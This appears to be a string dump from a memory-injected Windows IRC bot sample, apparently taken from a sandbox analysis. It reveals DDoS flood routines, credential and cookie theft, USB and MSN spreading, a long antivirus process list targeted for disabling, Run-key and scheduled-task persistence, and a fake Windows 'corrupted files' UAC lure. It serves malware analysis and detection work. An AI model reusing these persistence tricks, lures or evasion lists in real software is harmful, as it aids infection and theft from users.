%d</pre><pre>%s_0xX</pre><pre>RegCreateKeyExW</pre><pre>URLDownloadToFileW</pre><pre>HttpSendRequestW</pre><pre>HttpSendRequestA</pre><pre>NtEnumerateValueKey</pre><pre>Secur32.dll</pre><pre>ShellExecuteA</pre><pre>HttpQueryInfoA</pre><pre>InternetOpenUrlA</pre><pre>HttpQueryInfoW</pre><pre>WININET.dll</pre><pre>WS2_32.dll</pre><pre>MSVCRT.dll</pre><pre>ConnectNamedPipe</pre><pre>CreateNamedPipeA</pre><pre>DisconnectNamedPipe</pre><pre>GetWindowsDirectoryW</pre><pre>RegNotifyChangeKeyValue</pre><pre>PASS %s</pre><pre>[.ShellClassInfo]</pre><pre>CLSID={645FF040-5081-101B-9F08-00AA002F954E}</pre><pre>SSRR %s 0 0 :%s</pre><pre>KCIK %s</pre><pre>SEND %s %s</pre><pre>PART %s</pre><pre>PPPPMSG %s :%s</pre><pre>QUIT :%s</pre><pre>PPNG %s</pre><pre>PPPPMSG</pre><pre>[v="%s" c="%s" h="%s" p="%S"]</pre><pre>[d="%s" s="%d bytes"] Updated bot file "%S" - Download retries: %d</pre><pre>[d="%s" s="%d bytes"] Executed file "%S" - Download retries: %d</pre><pre>[Slowloris]: Starting flood on "%s" for %d minute(s)</pre><pre>[Slowloris]: Finished flood on "%s"</pre><pre>[UDP]: Starting flood on "%s:%d" for %d second(s)</pre><pre>[UDP]: Finished flood on "%s:%d"</pre><pre>[SYN]: Starting flood on "%s:%d" for %d second(s)</pre><pre>[SYN]: Finished flood on "%s:%d"</pre><pre>[USB]: Infected %s</pre><pre>[MSN]: Updated MSN spread message to "%s"</pre><pre>[MSN]: Updated MSN spread interval to "%s"</pre><pre>[HTTP]: Updated HTTP spread message to "%s"</pre><pre>[HTTP]: Injected value is now %s.</pre><pre>[HTTP]: Updated HTTP spread interval to "%s"</pre><pre>[Visit]: Visited "%s"</pre><pre>[DNS]: Blocked "%s"</pre><pre>[usb="%d" msn="%d" http="%d" total="%d"]</pre><pre>[ftp="%d" pop="%d" http="%d" total="%d"]</pre><pre>[RSOCK4]: Started rsock4 on "%s:%d"</pre><pre>[d="%s" s="%d bytes"] Update error: MD5 mismatch (%s != %s)</pre><pre>[d="%s"] Error downloading file [e="%d"]</pre><pre>[d="%s"] Error writing download to "%S" [e="%d"]</pre><pre>[d="%s" s="%d bytes"] Error creating process "%S" [e="%d"]</pre><pre>[d="%s" s="%d bytes"] File "%S" has an invalid binary type. [type="%d"]</pre><pre>[d="%s"] Error getting temporary filename. [e="%d"]</pre><pre>[d='%s"] Error getting application data path [e="%d"]</pre><pre>[Visit]: Error visitng "%s"</pre><pre>[FTP Login]: %s</pre><pre>[POP3 Login]: %s</pre><pre>[FTP Infect]: %s was iframed</pre><pre>[HTTP Login]: %s</pre><pre>[HTTP Traffic]: %s</pre><pre>[Ruskill]: Detected File: "%s"</pre><pre>[Ruskill]: Detected DNS: "%s"</pre><pre>[Ruskill]: Detected Reg: "%s"</pre><pre>[PDef ]: %s</pre><pre>[DNS]: Blocked DNS "%s"</pre><pre>[MSN]: %s</pre><pre>[HTTP]: %s</pre><pre>ftplog</pre><pre>ftpinfect</pre><pre>httplogin</pre><pre>httptraff</pre><pre>httpspread</pre><pre>http://api.wipmania.com/</pre><pre>\\.\pipe\x_ipc</pre><pre>7 767<7~7</pre><pre>8*808;8~8</pre><pre>{A5DCBF10-6530-11D2-901F-00C04FB951ED}</pre><pre>shlwapi.dll</pre><pre>crypt32.dll</pre><pre>wtsapi32.dll</pre><pre>samcli.dll</pre><pre>netutils.dll</pre><pre>userenv.dll</pre><pre>WindowsSecondaryDesktop</pre><pre>\charmap.exe</pre><pre>\Windows Media Player\wmprph.exe</pre><pre>C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\ngggg.exe</pre><pre>%s\Identities\%s.exe</pre><pre>\\.\pipe</pre><pre>autorun.inf</pre><pre>pidgin.exe</pre><pre>wlcomm.exe</pre><pre>msnmsgr.exe</pre><pre>msmsgs.exe</pre><pre>flock.exe</pre><pre>opera.exe</pre><pre>chrome.exe</pre><pre>ieuser.exe</pre><pre>iexplore.exe</pre><pre>firefox.exe</pre><pre>.ipconfig.exe</pre><pre>verclsid.exe</pre><pre>regedit.exe</pre><pre>rundll32.exe</pre><pre>cmd.exe</pre><pre>regsvr32.exe</pre><pre>l"%s" %S</pre><pre>lol.exe</pre><pre>n127.0.0.1</pre><pre>%s:Zone.Identifier</pre><pre>secur32.dll</pre><pre>ws2_32.dll</pre><pre>:%S%S\</pre><pre>winlogon.exe</pre><pre>Aadvapi32.dll</pre><pre>nspr4.dll</pre><pre>Akernel23.dll</pre><pre>y%s\%s.exe</pre><pre>lsass.exe</pre><pre>Software\Microsoft\Windows\CurrentVersion\Policies\System</pre><pre>.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run</pre>notepad.exe_1520_rwx_008B0000_00027000:<pre>.text</pre><pre>`.rdata</pre><pre>@.data</pre><pre>.rsrc</pre><pre>@.reloc</pre><pre>PSSSSSSh</pre><pre>PSSVSSh</pre><pre>RPVSSh</pre><pre>PSSh(</pre><pre>PSSh#</pre><pre>PSSh'</pre><pre>PSSh&</pre><pre>PSSh*</pre><pre>9p.uV</pre>notepad.exe_1520_rwx_008D8000_00072000:<pre>Opera/9.00 (Windows NT 5.1; U; en)</pre><pre>Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)</pre><pre>Mozilla/4.0 (compatible; MSIE 6.01; Windows NT 6.0)</pre><pre>Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 5.2)</pre><pre>Opera 9.4 (Windows NT 6.1; U; en)</pre><pre>Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)</pre><pre>Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; NeosBrowser; .NET CLR 1.1.4322; .NET CLR 2.0.50727)</pre><pre>Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; WOW64; SLCC1; .NET CLR 2.0.50727; .NET CLR 3.0.04506; Media Center PC 5.0; .NET CLR 1.1.4322; Windows-Media-Player/10.00.00.3990; InfoPath.2</pre><pre>Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.13) Gecko/20060410 Firefox/1.0.8</pre><pre>Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.8.1.11) Gecko/20071127 Firefox/2.0.0.11</pre><pre>Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322)</pre><pre>Mozilla/5.0 (compatible; MSIE 7.0; Windows NT 5.2; WOW64; .NET CLR 2.0.50726)</pre><pre>SbieDll.dll</pre><pre>Software\Classes\CLSID\%s\X</pre><pre>Software\Classes\CLSID\%s\X\%s</pre><pre>0xX</pre><pre>SB:0xX</pre><pre>G:%s_0xX_%c:%s_v1$</pre><pre>Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\%u</pre><pre>IEXPLORE.EXE</pre><pre>IE.HTTP</pre><pre>SOFTWARE\Microsoft\Windows\Shell\Associations\UrlAssociations\http\UserChoice</pre><pre>IE.HTTPS</pre><pre>SOFTWARE\Microsoft\Windows\Shell\Associations\UrlAssociations\https\UserChoice</pre><pre>SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.htm\UserChoice</pre><pre>SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.html\UserChoice</pre><pre>IE.AssocFile.HTM</pre><pre>HTTP\shell\open\command</pre><pre>Software\Microsoft\Windows\CurrentVersion\Ext\Settings\%s</pre><pre>Psapi.dll</pre><pre>%s\%s</pre><pre>Software\Adobe\Acrobat Reader\%s\Privileged</pre><pre>mscoree.dll</pre><pre>HARDWARE\DESCRIPTION\System\CentralProcessor\%u</pre><pre>SOFTWARE\Microsoft\Windows NT\CurrentVersion</pre><pre>nspr4.dll</pre><pre>nss3.dll</pre><pre>Urlmon.dll</pre><pre>URLDownloadToFileW</pre><pre>Netapi32.dll</pre><pre>76487-640-1457236-23837</pre><pre>76487-337-8429955-22614</pre><pre>76487-644-3177037-23510</pre><pre>76497-640-6308873-23835</pre><pre>55274-640-2673064-23950</pre><pre>76487-640-8834005-23195</pre><pre>76487-640-0716662-23535</pre><pre>76487-644-8648466-23106</pre><pre>00426-293-8170032-85146</pre><pre>76487-341-5883812-22420</pre><pre>SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer</pre><pre>SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsBackup</pre><pre>{8E5E2654-AD2D-48BF-AC2D-D17F00898D06}</pre><pre>snxhk.dll</pre><pre>comctl32.dll</pre><pre>ZwSetValueKey</pre><pre>ZwDeleteValueKey</pre><pre>SOFTWARE\%s</pre><pre>update.microsoft.com</pre><pre>microsoft.com</pre><pre>windowsupdate.microsoft.com</pre><pre>JOIN</pre><pre>PRIVMSG</pre><pre>.rdata</pre><pre>cmd_option.%s</pre><pre>/c %s</pre><pre>cmd.exe</pre><pre>msvcrt.dll</pre><pre>--x-x-x-xx</pre><pre>Content-Type: multipart/form-data; boundary=x-x-x-xx</pre><pre>Content-Disposition: multipart/form-data; name="newfile"; filename="%d.jpeg"</pre><pre>%s?action=up&g=%s</pre><pre>xul.dll</pre><pre><Port></Port></pre><pre><Pass></Pass></pre><pre>Content-Type: application/x-www-form-urlencoded</pre><pre>HTTP/1.1</pre><pre>?pid=%d</pre><pre>?page=%d</pre><pre>?id=%u</pre><pre>%s=%u&%s=%s</pre><pre>%s=%s&%s=%u</pre><pre>&%s=%s</pre><pre>&%s%u=</pre><pre>&%s%hu=</pre><pre>&%s=_%u</pre><pre>%d|%s|%s|%s</pre><pre>.info</pre><pre>httpget</pre><pre>GET /%s HTTP/1.1</pre><pre>Host: %s</pre><pre>Content-Length: %d</pre><pre>Accept: %s</pre><pre>Accept-Language: %s</pre><pre>Accept-Charset: %s</pre><pre>Accept-Encoding: %s</pre><pre>User-Agent: %s</pre><pre>Referer: %s</pre><pre>Connection: %s</pre><pre>http://</pre><pre>iexplore.exe</pre><pre>firefox.exe</pre><pre>tbb-firefox.exe</pre><pre>%s:%hu</pre><pre>windowsupdate</pre><pre>SSH2_MSG_KEXINIT</pre><pre>SSH2_MSG_DISCONNECT</pre><pre>SSH2_MSG_USERAUTH_SUCCESS</pre><pre>http://%s%s/image.php?id=%s</pre><pre>TaskDialogIndirect</pre><pre>http://answers.microsoft.com/en-us/windows/forum/windows_vista-windows_programs/corrupted-documents-folder/e2a7660f-8eea-4f27-b2e6-e77a0f0c1535</pre><pre>ÐxX</pre><pre>ntdll.dll</pre><pre>kernel32.dll</pre><pre>secur32.dll</pre><pre>crypt32.dll</pre><pre>user32.dll</pre><pre>advapi32.dll</pre><pre>wininet.dll</pre><pre>shell32.dll</pre><pre>shlwapi.dll</pre><pre>ole32.dll</pre><pre>version.dll</pre><pre>sfc.dll</pre><pre>dnsapi.dll</pre><pre>ws2_32.dll</pre><pre><requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel></pre><pre><assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" version="6.0.0.0" processorArchitecture="x86" publicKeyToken="6595b64144ccf1df" language="*"></assemblyIdentity></pre><pre>8"808]9|9</pre><pre>9%9 919<9</pre><pre>=(=/=6==={=</pre><pre>4 4?4^4}4</pre><pre>6o6g6r6w6</pre><pre>9 9$9(90949</pre><pre>.text</pre><pre>`.rdata</pre><pre>@.data</pre><pre>.rsrc</pre><pre>This pointer, %d, is aligned on %d</pre><pre>This pointer, %d, is not aligned on %d</pre><pre>%f, %f and %f form a right-angled triangle.</pre><pre>Invalid parameter passed to C runtime function.</pre><pre>?#%X.y</pre><pre>%S#[k</pre><pre>Please contact the application's support team for more information.</pre><pre>- Attempt to initialize the CRT more than once.</pre><pre>- CRT not initialized</pre><pre>- floating point support not loaded</pre><pre>GetProcessWindowStation</pre><pre>USER32.DLL</pre><pre>ShellExecuteA</pre><pre>SHELL32.dll</pre><pre>GetCPInfo</pre><pre>GetWindowsDirectoryA</pre><pre>CreatePipe</pre><pre>GetWindowsDirectoryW</pre><pre>GetConsoleOutputCP</pre><pre>KERNEL32.dll</pre><pre>.VI3xqr</pre><pre>zcÁ</pre><pre>Udp?iw0</pre><pre>/#"%f</pre><pre>P.oUw</pre><pre>B%Su[</pre><pre>Rkka.by</pre><pre>.dYi'</pre><pre>p.Cvq</pre><pre>.EU{%</pre><pre>D<w><pre>;0.Bx</pre><pre>%s)$O</pre><pre>i.zC:*</pre><pre>@7WeB</pre><pre>ld0%F</pre><pre>r. -.kN</pre><pre>.kal"</pre><pre>f.xKK</pre><pre>Software\Classes\CLSID\%S</pre><pre>G:%S_0xX</pre><pre>chrome.exe</pre><pre>opera.exe</pre><pre>safari.exe</pre><pre>maxthon.exe</pre><pre>:Mozilla\Firefox\Profiles</pre><pre>cookies.sqlite</pre><pre>%s\winsxs\x86_microsoft.windows.common-controls_*6.0.*_*</pre><pre>%s\winsxs\%s\comctl32.dll</pre><pre>SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\%s</pre><pre>%s:*:Enabled</pre><pre>avcuf32.dll</pre><pre>SOFTWARE\Microsoft\Windows\CurrentVersion\Run</pre><pre>prstrui.exe</pre><pre>Windows Defender</pre><pre>MpClient.dll</pre><pre>Windows Defender\MSASCui.exe</pre><pre>MpSvc.dll</pre><pre>msseces.exe</pre><pre>MsMpEng.exe</pre><pre>MSASCui.exe</pre><pre>MpAsDesc.dll</pre><pre>MsMpLics.dll</pre><pre>avgui.exe</pre><pre>avgidsagent.exe</pre><pre>avgwdsvc.exe</pre><pre>avgdiagex.exe</pre><pre>avgmfapx.exe</pre><pre>avgupd.exe</pre><pre>avgcfgex.exe</pre><pre>avgnt.exe</pre><pre>avguard.exe</pre><pre>avshadow.exe</pre><pre>avcenter.exe</pre><pre>update.dll</pre><pre>updaterc.dll</pre><pre>usrreq.exe</pre><pre>ccsvchst.exe</pre><pre>symerr.exe</pre><pre>NIS.exe</pre><pre>NAV.exe</pre><pre>navw32.exe</pre><pre>avastui.exe</pre><pre>AvastEmUpdate.exe</pre><pre>ashUpd.exe</pre><pre>WRSA.exe</pre><pre>zatray.exe</pre><pre>ForceField.exe</pre><pre>updating.dll</pre><pre>fshoster32.exe</pre><pre>fsaua.dll</pre><pre>PSUNMain.exe</pre><pre>PSUAService.exe</pre><pre>PSANHost.exe</pre><pre>PSUNScan.dll</pre><pre>epavjobs.exe</pre><pre>AVENGINE.exe</pre><pre>Upgrader.exe</pre><pre>adaware.exe</pre><pre>BullGuard.exe.manifest</pre><pre>BullGuardUpdate.exe</pre><pre>BullGuard.exe</pre><pre>BullGuardScanner.exe</pre><pre>BullGuardBhvScanner.exe</pre><pre>BullGuardUpdate2.exe</pre><pre>BgScan.exe</pre><pre>BgScanEngine.dll</pre><pre>.manifest</pre><pre>updater.exe</pre><pre>Backup\RSD\RSSetup\updater.exe</pre><pre>RsTray.exe</pre><pre>RavMonD.exe</pre><pre>RsMgrSvc.exe</pre><pre>rsmain.exe</pre><pre>RsScan.dll</pre><pre>RsTray.dll</pre><pre>mbamgui.exe</pre><pre>mbam.exe</pre><pre>pctsGui.exe</pre><pre>pctsAuxs.exe</pre><pre>pctsSvc.exe</pre><pre>Update.exe</pre><pre>UpdateHlpr.dll</pre><pre>Definitions\vcore.dll</pre><pre>sbamui.exe</pre><pre>SBAMTray.exe</pre><pre>updater_client_mod.dll</pre><pre>FProtTray.exe</pre><pre>FPWin.exe</pre><pre>scf.dat</pre><pre>ALUpdate.exe</pre><pre>update_tmp.exe</pre><pre>arcaclean.exe</pre><pre>BavUpdater.exe</pre><pre>rcfp.exe</pre><pre>CLPSLA.exe</pre><pre>op_mon.exe</pre><pre>niu.exe</pre><pre>K7TSUpdT.exe</pre><pre>sguardxup.exe</pre><pre>ccupdate.exe</pre><pre>caupdate.dll</pre><pre>a2guard.exe</pre><pre>a2start.exe</pre><pre>a2service.exe</pre><pre>AVKTray.exe</pre><pre>GDSC.exe</pre><pre>AVK.exe</pre><pre>GDFirewallTray.exe</pre><pre>Bka.exe</pre><pre>BLuPro.exe</pre><pre>BkavSystemServer.exe</pre><pre>BkavService.exe</pre><pre>LiveUpdate.dll</pre><pre>LiveConnect.dll</pre><pre>BaseFile\Bkav\LiveUpdate.dll</pre><pre>V3Lite.exe</pre><pre>ASDSvc.exe</pre><pre>autoup.exe</pre><pre>downloader.exe</pre><pre>%s.config</pre><pre>updatesrv.exe</pre><pre>updatemgr.dll</pre><pre>egui.exe</pre><pre>ekrn.exe</pre><pre>x86\ekrn.exe</pre><pre>uWinMgr.exe</pre><pre>coreServiceShell.exe</pre><pre>uiSeAgnt.exe</pre><pre>uiWatchDog.exe</pre><pre>plugins\plugUpdater.dll</pre><pre>UiFrmwrk\uiUpdateTray.exe</pre><pre>coreFrameworkHost.exe</pre><pre>mcagent.exe</pre><pre>McSvHost.exe</pre><pre>McUICnt.exe</pre><pre>McPvTray.exe</pre><pre>mcui_exe</pre><pre>mcpltui_exe</pre><pre>mcshell.exe</pre><pre>mcupdmgr.exe</pre><pre>mcupdate.exe</pre><pre>mcshield.exe</pre><pre>mcupdui.dll</pre><pre>McAPExe.exe</pre><pre>.config</pre><pre>Image File Execution Options\%s</pre><pre>SYSTEM\CurrentControlSet\services\%s</pre><pre>%c:\ntusbdriver.sys</pre><pre>%c:\*p.exe</pre><pre>%c:\%s</pre><pre>p.exe</pre><pre>%WinDir%\explorer.exe</pre><pre>/C start /d. %s&"%s"</pre><pre>%COMSPEC%</pre><pre>%WinDir%\system32\shell32.dll</pre><pre>%c:\%s.lnk</pre><pre>VisthAux.exe</pre><pre>explorer.exe</pre><pre>t.minecraft</pre><pre>Works! PID: %d, Name: %s</pre><pre>cmdvirth</pre><pre>%s%s\X</pre><pre>tcp://</pre><pre>svchost.exe</pre><pre>csrss.exe</pre><pre>lsass.exe</pre><pre>smss.exe</pre><pre>wscript.exe</pre><pre>cscript.exe</pre><pre>vbc.exe</pre><pre>rundll32.exe</pre><pre>regsvr32.exe</pre><pre>SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run</pre><pre>winlogon.exe</pre><pre>services.exe</pre><pre>%s\x.lnk</pre><pre>SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\%s</pre><pre>desktop.ini</pre><pre>SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce</pre><pre>SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows</pre><pre>wintrust.dll</pre><pre>chrome.dll</pre><pre>Applications\iexplore.exe\shell\open\command</pre><pre>%s_xx</pre><pre>x.zip</pre><pre>Navw32.exe</pre><pre>SysInspector.exe</pre><pre>avscan.exe</pre><pre>mfefire.exe</pre><pre>wuauclt.exe</pre><pre>WerFault.exe</pre><pre>lFileZilla\sitemanager.xml</pre><pre>port</pre><pre>Sites.dat</pre><pre>Quick.dat</pre><pre>%s\3\%s</pre><pre>%s\4\%s</pre><pre>spoolsv.exe</pre><pre>steam.exe</pre><pre>skype.exe</pre><pre>origin.exe</pre><pre>dwm.exe</pre><pre>tapi3.dll</pre><pre>/C copy "%s" "%s"</pre><pre>SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run</pre><pre>Windows Update Service</pre><pre>"%s" /%s</pre><pre>Software\Microsoft\Windows\CurrentVersion\RunOnce</pre><pre>/CREATE /SC ONLOGON /TN "Windows Update Check - 0xX" /TR "%s" /RL HIGHEST</pre><pre>schtasks.exe</pre><pre>/DELETE /TN "Windows Update Check - 0xX" /F</pre><pre>\Windows\Explorer.exe</pre><pre>Low_X</pre><pre>%s.manifest</pre><pre>PendingFileRenameOperations</pre><pre>%s\X</pre><pre>Windows\CurrentVersion\Run</pre><pre>CurrentVersion\Windows</pre><pre>Windows NT\CurrentVersion\Image File Execution Options\%s</pre><pre>Windows has encountered a corrupted folder on your hard drive</pre><pre>Multiple corrupted files have been found in the folder 'My Documents'. To prevent serious loss of data, please allow Windows to restore these files.</pre><pre>Corrupted folder: %s</pre><pre>Corrupted file count: %d</pre><pre><a href=".ms">%s</a></pre><pre>/c start "" "%s" /%s "%s"</pre><pre>shell32,ShellExec_RunDLL "%s" /%s "%s"</pre><pre>You denied the proper privileges to the Windows file restoration utility. Please select YES on the following UAC prompt to allow Windows to restore the corrupted files.</pre><pre>Windows 3.1 Update Service</pre><pre>%s:Zone.Identifier</pre><pre>%s\X.pif</pre><pre>KERNEL32.DLL</pre><pre>KERNELBASE.DLL</pre><pre>kernelbase.dll</pre><pre>oSome operation could not be performed because the system is out of resources. Close some windows and try again.</pre><pre>Setting bit transparency color is not allowed for png images containing alpha value for each pixel (COLOR_RGBALPHA and COLOR_GRAYSCALEALPHA)OThis operation is not valid because the current image contains no valid header.4The new size provided for image resizing is invalid.oThe "Portable Network Graphics" could not be created because invalid image type parameters have being provided.2Software\Microsoft\Windows\CurrentVersion\Explorer</pre><pre>UThis "Portable Network Graphics" image is invalid because it has missing image parts.[Could not decompress the image because it contains invalid compressed data.</pre><pre>Description: BThe "Portable Network Graphics" image contains an invalid palette.</pre><pre>The file being read is not a valid "Portable Network Graphics" image because it contains an invalid header. This file may be corrupted, try obtaining it againnThis "Portable Network Graphics" image is not supported or it might be invalid.</pre><pre>This "Portable Network Graphics" image is not supported because either its width or height exceeds the maximum size of 65535 pixels.</pre><pre>There is no such palette entry.dThis "Portable Network Graphics" image contains an unknown critical part which could not be decoded.pThis "Portable Network Graphics" image is encoded with an unknown compression scheme which could not be decoded.cThis "Portable Network Graphics" image uses an unknown interlace scheme which could not be decoded.-The chunks must be compatible to be assigned.jThis "Portable Network Graphics" image is invalid because the decoder found an unexpected end of the file.8This "Portable Network Graphics" image contains no data.]The program tried to add a existent critical chunk to the current image which is not allowed.IIt's not allowed to add a new chunk because the current image is invalid.7The png image could not be loaded from the resource ID.)Class '%s' is already registered for '%s'%Class '%s' is not registered for '%s'</pre><pre>%s parameter cannot be nil#Feature not supported by this style</pre><pre>Style '%s' is not registered"Cannot unregister the system style</pre><pre>OLE error %.8x.Method '%s' not supported by automation object/Variant does not reference an automation object7Dispatch methods do not support more than 64 parameters</pre><pre>Failed to Save StreamjThis "Portable Network Graphics" image is not valid because it contains invalid pieces of data (crc error)yThe "Portable Network Graphics" image could not be loaded because one of its main piece of data (ihdr) might be corrupted</pre><pre>Login</pre><pre>"%s" is an invalid pathÊnnot remove shell notification icon"%s requires Windows Vista or later</pre><pre>Button%d</pre><pre>RadioButton%d</pre><pre>Unable to load style '%s'</pre><pre>Unable to load styles: %s</pre><pre>Style '%s' already registered#Style class '%s' already registered</pre><pre>Style '%s' not found</pre><pre>Style class '%s' not found</pre><pre>All Clipboard does not support Icons</pre><pre>Cannot open clipboard: %s</pre><pre>Text exceeds memo capacity Operation not supported on selected printer.There is no default printer currently selected/Menu '%s' is already being used by another form</pre><pre>- Dock zone has no controlLError loading dock zone from the stream. Expecting version %d, but found %d.7Length of value array must be >= length of prompt array</pre><pre>&Password</pre><pre>Value must be between %d and %d</pre><pre>%s on %s@GroupIndex cannot be less than a previous menu item's GroupIndex5Cannot create form. No MDI forms are currently active0Can only modify an image if it contains a bitmap*A control cannot have itself as its parent</pre><pre>Error creating window class Cannot focus a disabled or invisible window!Control '%s' has no parent window$Parent given is not a parent of '%s'</pre><pre>%s property out of rangeGNo single cast observer with ID %d was added to the observer collectionFNo multi cast observer with ID %d was added to the observer collection</pre><pre>Scan line index out of range!Cannot change the size of an iconÊnnot change the size of a WIC Image$Unknown picture file extension (.%s)</pre><pre>Unsupported clipboard format</pre><pre>Canvas does not allow drawing#Text format flag '%s' not supported</pre><pre>Windows Server 2003</pre><pre>Windows Server 2003 R2</pre><pre>Windows Server 2012</pre><pre>Windows 8</pre><pre>Error writing zip file"Invalid Zip Local Header signature$Invalid Zip Central Header signature1Support for compression method not registered: %s</pre><pre>Observer is not supportedLCannot have multiple single cast observers added to the observers collection4The object does not implement the observer interface5Insufficient RTTI available to support this operation</pre><pre>Parameter count mismatch<Type><pre>Windows</pre><pre>Windows Vista</pre><pre>Windows Server 2008</pre><pre>Windows 7</pre><pre>Windows Server 2008 R2</pre><pre>Windows 2000</pre><pre>Windows XP</pre><pre>Timespan too longbThe duration cannot be returned because the absolute value exceeds the value of TTimeSpan.MaxValue</pre><pre>No help found for context %d</pre><pre>No help found for %s</pre><pre>Parameter %s cannot be nil'Parameter %s cannot be a negative value*Input buffer exceeded for %s = %d, %s = %d</pre><pre>The specified path is too long The specified path was not found The path format is not supported</pre><pre>The drive cannot be found The specified file was not foundWThe given "%s" local time is invalid (situated within the missing period prior to DST).$No help viewer that supports filters</pre><pre>Invalid Timeout value: %s</pre><pre>Failed to create key %s</pre><pre>Failed to get data for '%s'</pre><pre>Failed to set data for '%s'</pre><pre>Resource %s not found</pre><pre>%s.Seek not implemented$Operation not allowed on sorted list$%s not in a class registration group</pre><pre>Property %s does not exist</pre><pre>Thread creation error: %s</pre><pre>Thread Error: %s (%d)-Cannot terminate an externally created thread,Cannot wait for an externally created thread2Cannot call Start on a running or suspended thread;Cannot call CheckTerminated on an externally created thread</pre><pre>Unable to write to %s</pre><pre>Invalid file name - %s</pre><pre>'%s' is an invalid mask at (%d)$''%s'' is not a valid component name</pre><pre>Invalid data type for '%s' List capacity out of bounds (%d)</pre><pre>List count out of bounds (%d)</pre><pre>List index out of bounds (%d) Out of memory while expanding memory stream)%s has not been registered as a COM class</pre><pre>Error reading %s%s%s: %s</pre><pre>Invalid count (%d)</pre><pre>Invalid destination index (%d)</pre><pre>Ancestor for '%s' not found</pre><pre>Cannot assign a %s to a %s</pre><pre>Bits index out of range*Can't write to a read-only resource streamECheckSynchronize called from thread $%x, which is NOT the main thread</pre><pre>Class %s not found</pre><pre>A class named %s already exists%List does not allow duplicates ($0%x)#A component named %s already exists%String list does not allow duplicates</pre><pre>Cannot create file "%s". %s</pre><pre>Cannot open file "%s". %s</pre><pre>Invalid destination array"Character index out of bounds (%d)</pre><pre>Start index out of bounds (%d)</pre><pre>%s (%s, line %d)</pre><pre>Abstract Error?Access violation at address %p in module '%s'. %s of address %p</pre><pre>System Error. Code: %d.</pre><pre>2Too many custom variant types have been registered5Could not convert variant of type (%s) into type (%s)=Overflow while converting variant of type (%s) into type (%s)</pre><pre>Operation not supported</pre><pre>External exception %x</pre><pre>Interface not supported</pre><pre>Object lock not owned(Monitor support function not initialized</pre><pre>Application Error1Format '%s' invalid or incompatible with argument</pre><pre>No argument for format '%s'"Variant method calls not supported</pre><pre>Invalid variant operation</pre><pre>Invalid NULL variant operation%Invalid variant operation (%s%.8x)</pre><pre>%s,Custom variant type (%s%.4x) is out of range/Custom variant type (%s%.4x) already used by %s*Custom variant type (%s%.4x) is not usable</pre><pre>Integer overflow Invalid floating point operation</pre><pre>Invalid pointer operation</pre><pre>Invalid class typecast0Access violation at address %p. %s of address %p</pre><pre>Privileged instruction(Exception %s in module %s at %p.</pre><pre><unknown>!'%s' is not a valid integer value('%s' is not a valid floating point value</unknown></pre><pre>'%s' is not a valid date</pre><pre>'%s' is not a valid time!'%s' is not a valid date and time '%d.%d' is not a valid timestamp</pre><pre>'%s' is not a valid GUID value</pre><pre>I/O error %d</pre>notepad.exe_1520_rwx_00950000_0004E000:<pre>.text</pre><pre>`.rdata</pre><pre>@.data</pre><pre>.reloc</pre><pre>=MSG t</pre><pre>>MSG u`</pre><pre>=PASS</pre><pre>8httpu1</pre><pre>8httpuM</pre><pre>tlSSSSSSSSSShL0</pre><pre>%s.%s</pre><pre>%s.%S</pre><pre>%s.Blocked "%s" from removing our bot file!</pre><pre>%s.Blocked "%S" from removing our bot file!</pre><pre>i.root-servers.org</pre><pre>%s.Blocked "%s" from moving our bot file</pre><pre>%s.Blocked "%S" from moving our bot file</pre><pre>%s.p10-> Message hijacked!</pre><pre>%s.p10-> Message to %s hijacked!</pre><pre>%s.p21-> Message hijacked!</pre><pre>msnmsg</pre><pre>CAL %d %6s</pre><pre>ngr->blocksize: %d</pre><pre>block_size: %d</pre><pre>\\.\pipe\%s</pre><pre>kernel32.dll</pre><pre>%s_%d</pre><pre>-%sMutex</pre><pre>ntdll.dll</pre><pre>%s-pid</pre><pre>%s-comm</pre><pre>JOIN #</pre><pre>PRIVMSG #</pre><pre>%s.Blocked "%S" from creating "%S"</pre><pre>%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!</pre><pre>%s.Detected process "%S" sending an IRC packet to server %s:%d.</pre><pre>%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).</pre><pre>PRIVMSG %5s</pre><pre>JOIN %5s</pre><pre>PRIVMSG</pre><pre>JOIN</pre><pre>%s:%d</pre><pre>%s.%s%s</pre><pre>%S%s%s</pre><pre>%s.%S%S</pre><pre>%S%S%S</pre><pre>state_%s</pre><pre>%s.%s (p='%S')</pre><pre>pop3://%s:%s@%s:%d</pre><pre>%s:%s@%s:%d</pre><pre>ftp://%s:%s@%s:%d</pre><pre>ftpgrab</pre><pre>%s.%s ->> %s (%s : %s)</pre><pre>%s.%s ->> %s : %s</pre><pre>%s-%s-%s</pre><pre>%s.Blocked possible browser exploit pack call on URL '%s'</pre><pre>%s.Blocked possible browser exploit pack call on URL 